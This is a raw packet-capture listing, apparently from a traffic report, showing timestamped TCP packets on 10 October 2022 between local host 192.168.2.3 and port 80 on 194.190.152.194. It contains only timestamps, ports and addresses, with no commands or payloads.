                                                                                                                                    Oct 10, 2022 06:01:56.734679937 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.734721899 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.734724045 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.734764099 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.734806061 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.734813929 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.734850883 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.734920025 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.734925985 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.734967947 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735008955 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735028028 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.735052109 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735094070 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735101938 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.735135078 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735177040 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735183001 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.735217094 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735256910 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735275984 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.735296965 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735342979 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.735351086 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735397100 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735436916 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735443115 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.735479116 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735522032 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735524893 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.735562086 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735600948 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735606909 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.735641956 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735683918 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735687017 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.735727072 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735768080 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735770941 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.735809088 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735852003 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.735852957 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735893965 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735934019 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.735939980 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.735974073 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.736016035 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.736020088 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.736062050 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.736118078 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.797816992 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.797890902 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.797975063 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798017979 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798058987 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798099995 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798144102 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798187971 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798188925 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.798188925 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.798190117 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.798228025 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798252106 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.798270941 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798311949 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798325062 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.798353910 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798394918 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798403025 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.798434973 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798475027 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798486948 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.798518896 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798559904 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798588991 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.798599958 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798640966 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798654079 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.798683882 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798727036 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798738003 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.798765898 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798808098 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798818111 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.798854113 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798923016 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.798928022 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.798969984 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799012899 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799025059 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.799052954 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799094915 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799108028 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.799137115 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799177885 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799186945 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.799220085 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799259901 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799273968 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.799300909 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799341917 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799352884 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.799382925 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799424887 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799434900 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.799467087 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799506903 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799520016 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.799546957 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799587011 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799597979 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.799627066 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799666882 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799678087 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.799707890 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799750090 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799758911 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.799793005 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799839973 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799863100 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.799880981 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799921989 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.799937963 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.799963951 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.800034046 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.861860991 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.861939907 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.861983061 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862025023 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862066984 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862112045 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862152100 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862154007 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.862154961 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.862154961 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.862195015 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862236977 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862236977 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.862278938 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862319946 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862322092 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.862361908 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862401009 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.862402916 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862452984 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862493992 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862513065 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.862536907 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862577915 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862580061 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.862618923 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862658978 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862659931 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.862704992 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862746000 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.862746954 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862791061 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862834930 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862837076 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.862901926 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862948895 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.862951994 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.862989902 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863030910 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863034010 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.863073111 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863114119 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863126993 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.863161087 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863203049 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863204956 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.863245010 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863286018 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863287926 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.863327980 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863368034 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863384962 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.863410950 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863451958 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.863451958 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863493919 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863535881 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863538027 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.863576889 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863617897 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863619089 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.863658905 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863698959 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863699913 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.863739967 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863780975 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863781929 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.863821983 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863867044 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.863867998 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863909006 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863950968 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.863953114 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.863991022 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.864032984 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.864037991 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.912632942 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.925904989 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.925971031 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926014900 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926058054 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926089048 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.926136971 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926139116 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.926179886 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926220894 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926238060 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.926290035 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926331997 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926332951 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.926374912 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926415920 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926417112 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.926457882 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926500082 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926501036 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.926541090 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926580906 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926582098 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.926628113 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926657915 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926691055 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.926698923 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926739931 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926743031 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.926779985 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926822901 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926826954 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.926865101 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926906109 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.926934958 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.926980019 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927021027 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927023888 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.927062988 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927103996 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927109003 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.927144051 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927186012 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927186012 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.927227020 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927268028 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927268028 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.927309990 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927350044 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927351952 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.927391052 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927432060 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.927432060 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927473068 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927514076 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927514076 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.927555084 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927596092 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927596092 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.927639008 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927680016 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927680969 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.927721024 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927762032 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.927762985 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927803993 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927845001 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.927846909 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927887917 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927927971 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.927930117 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.927969933 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.928014994 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.974708080 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.974787951 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.975009918 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.989754915 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.989819050 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.989902020 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.989947081 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.989991903 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.989989042 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.989989042 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.990051031 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.990093946 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.990097046 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.990138054 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.990185022 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.990191936 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.990236998 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.990278959 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.990304947 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.990322113 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.990361929 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.990364075 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.990406036 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.990446091 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:56.990447044 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:56.990488052 CEST8049692194.190.152.194192.168.2.3
